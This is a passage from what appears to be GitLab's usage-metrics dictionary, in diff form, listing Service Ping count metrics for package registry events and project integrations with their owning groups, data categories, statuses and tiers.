`data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_rubygems_pull_package` + +Total count of pull RubyGems packages events + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210303153002_package_events_i_package_rubygems_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_rubygems_push_package` + +Total count of push RubyGems packages events + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210303153004_package_events_i_package_rubygems_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_tag_delete_package` + +A count of package tags that have been deleted from the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183017_package_events_i_package_tag_delete_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_tag_pull_package` + +A count of package tags that have been downloaded from the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183019_package_events_i_package_tag_pull_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_tag_push_package` + +A count of package tags that have been published to the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183021_package_events_i_package_tag_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_terraform_module_delete_package` + +Total count of Terraform Module packages delete events + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210410012200_package_events_i_package_terraform_module_delete_package.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_terraform_module_pull_package` + +Total count of pull Terraform Module packages events + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210410012202_package_events_i_package_terraform_module_pull_package.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_terraform_module_push_package` + +Total count of push Terraform Module packages events + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210410012204_package_events_i_package_terraform_module_push_package.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.packages` + +The total number of packages published to the registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181012_packages.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.pages_domains` + +Total GitLab Pages domains + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181946_pages_domains.yml) + +Group: `group::release management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.personal_snippets` + +Count of personal Snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180239_personal_snippets.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.pod_logs_usages_total` + +Count the total number of log views + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175021_pod_logs_usages_total.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free` + +### `counts.pool_repositories` + +Count of unique object pool repositories for fork deduplication + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180410_pool_repositories.yml) + +Group: `group::gitaly` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.productivity_analytics_views` + +Total visits to /groups/:group/-/analytics/productivity_analytics all time + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174834_productivity_analytics_views.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.project_clusters_disabled` + +Total GitLab Managed disabled clusters previously attached to projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175244_project_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.project_clusters_enabled` + +Total GitLab Managed clusters attached to projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175236_project_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.project_snippets` + +Count of project Snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180241_project_snippets.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects` + +Count of Projects created + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181254_projects.yml) + +Group: `group::project management` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_asana_active` + +Count of projects with active integrations for Asana + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175623_projects_asana_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_assembla_active` + +Count of projects with active integrations for Assembla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175634_projects_assembla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_bamboo_active` + +Count of projects with active integrations for Bamboo CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175645_projects_bamboo_active.yml) + +Group: `group::ecosystem` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_bugzilla_active` + +Count of projects with active integrations for Bugzilla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175657_projects_bugzilla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_buildkite_active` + +Count of projects with active integrations for Buildkite + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175708_projects_buildkite_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_campfire_active` + +Count of projects with active integrations for Campfire + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175719_projects_campfire_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_confluence_active` + +Count of projects with active integrations for Confluence + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175731_projects_confluence_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_creating_incidents` + +Counts of Projects that have incident issues, regardless of status. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180453_projects_creating_incidents.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_custom_issue_tracker_active` + +Count of projects with active integrations for a Custom Issue Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175742_projects_custom_issue_tracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_datadog_active` + +Count of projects with active integrations for Datadog + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182547_projects_datadog_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_discord_active` + +Count of projects with active integrations for Discord + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175753_projects_discord_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_drone_ci_active` + +Count of projects with active integrations for Drone CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175804_projects_drone_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_emails_on_push_active` + +Count of projects with active integrations for Emails on Push + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175815_projects_emails_on_push_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_ewm_active` + +Count of projects with active integrations for EWM + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182614_projects_ewm_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_external_wiki_active` + +Count of projects with active integrations for External Wiki + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175826_projects_external_wiki_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_flowdock_active` + +Count of projects with active integrations for Flowdock + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175837_projects_flowdock_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_github_active` + +Count of projects with active integrations for GitHub + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175848_projects_github_active.yml) + +Group: `group::ecosystem` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.projects_hangouts_chat_active` + +Count of projects with active integrations for Hangouts Chat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175859_projects_hangouts_chat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_hipchat_active` + +Count of projects with active integrations for HipChat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175910_projects_hipchat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_imported_from_github` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180628_projects_imported_from_github.yml) + +Group: `group::import` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `counts.projects_inheriting_asana_active` + +Count of active projects inheriting integrations for Asana + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175630_projects_inheriting_asana_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_assembla_active` + +Count of active projects inheriting integrations for Assembla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175642_projects_inheriting_assembla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_bamboo_active` + +Count of active projects inheriting integrations for Bamboo CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175653_projects_inheriting_bamboo_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_bugzilla_active` + +Count of active projects inheriting integrations for Bugzilla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175704_projects_inheriting_bugzilla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_buildkite_active` + +Count of active projects inheriting integrations for Buildkite + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175716_projects_inheriting_buildkite_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_campfire_active` + +Count of active projects inheriting integrations for Campfire + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175727_projects_inheriting_campfire_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_confluence_active` + +Count of active projects inheriting integrations for Confluence + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175738_projects_inheriting_confluence_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_custom_issue_tracker_active` + +Count of active projects inheriting integrations for a Custom Issue Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175749_projects_inheriting_custom_issue_tracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_datadog_active` + +Count of active projects inheriting integrations for Datadog + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182555_projects_inheriting_datadog_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_discord_active` + +Count of active projects inheriting integrations for Discord + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175800_projects_inheriting_discord_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_drone_ci_active` + +Count of active projects inheriting integrations for Drone CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175811_projects_inheriting_drone_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_emails_on_push_active` + +Count of active projects inheriting integrations for Emails on Push + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175822_projects_inheriting_emails_on_push_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_ewm_active` + +Count of active projects inheriting integrations for EWM + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182622_projects_inheriting_ewm_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_external_wiki_active` + +Count of active projects inheriting integrations for External Wiki + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175833_projects_inheriting_external_wiki_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_flowdock_active` + +Count of active projects inheriting integrations for Flowdock + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175844_projects_inheriting_flowdock_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_github_active` + +Count of active projects inheriting integrations for GitHub + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175855_projects_inheriting_github_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.projects_inheriting_hangouts_chat_active` + +Count of active projects inheriting integrations for Hangouts Chat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175906_projects_inheriting_hangouts_chat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_hipchat_active` + +Count of active projects inheriting integrations for HipChat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175917_projects_inheriting_hipchat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_irker_active` + +Count of active projects inheriting integrations for Irker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175928_projects_inheriting_irker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_jenkins_active` + +Count of active projects inheriting integrations for Jenkins + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175939_projects_inheriting_jenkins_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_jira_active` + +Count of active projects inheriting integrations for Jira + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175950_projects_inheriting_jira_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_mattermost_active` + +Count of active projects inheriting integrations for Mattermost + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180001_projects_inheriting_mattermost_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_mattermost_slash_commands_active` + +Count of active projects inheriting integrations for Mattermost (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180012_projects_inheriting_mattermost_slash_commands_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_microsoft_teams_active` + +Count of active projects inheriting integrations for Microsoft Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180023_projects_inheriting_microsoft_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_mock_ci_active` + +Count of active projects inheriting integrations for Mock CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182730_projects_inheriting_mock_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_mock_monitoring_active` + +Count of active projects inheriting integrations for Mock Monitoring + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182741_projects_inheriting_mock_monitoring_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_packagist_active` + +Count of active projects inheriting integrations for Packagist + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180034_projects_inheriting_packagist_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_pipelines_email_active` + +Count of active projects inheriting integrations for Pipeline Emails + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180045_projects_inheriting_pipelines_email_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_pivotaltracker_active` + +Count of active projects inheriting integrations for Pivotal Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180056_projects_inheriting_pivotaltracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_prometheus_active` + +Count of active projects inheriting integrations for Prometheus + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180938_projects_inheriting_prometheus_active.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_pushover_active` + +Count of active projects inheriting integrations for Pushover + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180107_projects_inheriting_pushover_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_redmine_active` + +Count of active projects inheriting integrations for Redmine + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180118_projects_inheriting_redmine_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_slack_active` + +Count of active projects inheriting integrations for Slack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180129_projects_inheriting_slack_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_slack_slash_commands_active` + +Count of active projects inheriting integrations for Slack (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180140_projects_inheriting_slack_slash_commands_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_teamcity_active` + +Count of active projects inheriting integrations for Teamcity CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180151_projects_inheriting_teamcity_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_unify_circuit_active` + +Count of active projects inheriting integrations for Unifiy Circuit + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180203_projects_inheriting_unify_circuit_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_webex_teams_active` + +Count of active projects inheriting integrations for Webex Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180214_projects_inheriting_webex_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_inheriting_youtrack_active` + +Count of active projects inheriting integrations for YouTrack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180225_projects_inheriting_youtrack_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_irker_active` + +Count of projects with active integrations for Irker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175921_projects_irker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_jenkins_active` + +Count of projects with active integrations for Jenkins + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175932_projects_jenkins_active.yml) + +Group: `group::ecosystem` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_jira_active` + +Count of projects with active integrations for Jira + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175943_projects_jira_active.yml) + +Group: `group::ecosystem` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_jira_cloud_active` + +Count of active integrations with Jira Cloud (Saas) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180230_projects_jira_cloud_active.yml) + +Group: `group::ecosystem` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_jira_dvcs_cloud_active` + +Count of active integrations with Jira Cloud (DVCS Connector) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180232_projects_jira_dvcs_cloud_active.yml) + +Group: `group::ecosystem` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_jira_dvcs_server_active` + +Count of active integrations with Jira Software (DVCS connector) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180234_projects_jira_dvcs_server_active.yml) + +Group: `group::ecosystem` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_jira_issuelist_active` + +Total Jira Issue feature enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180236_projects_jira_issuelist_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.projects_jira_server_active` + +Count of active integrations with Jira Software (server) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180228_projects_jira_server_active.yml) + +Group: `group::ecosystem` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_mattermost_active` + +Count of projects with active integrations for Mattermost + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175954_projects_mattermost_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_mattermost_slash_commands_active` + +Count of projects with active integrations for Mattermost (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180005_projects_mattermost_slash_commands_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_microsoft_teams_active` + +Count of projects with active integrations for Microsoft Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180016_projects_microsoft_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_mirrored_with_pipelines_enabled` + +Projects with repository mirroring enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181920_projects_mirrored_with_pipelines_enabled.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.projects_mock_ci_active` + +Count of projects with active integrations for Mock CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182722_projects_mock_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_mock_monitoring_active` + +Count of projects with active integrations for Mock Monitoring + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182734_projects_mock_monitoring_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### 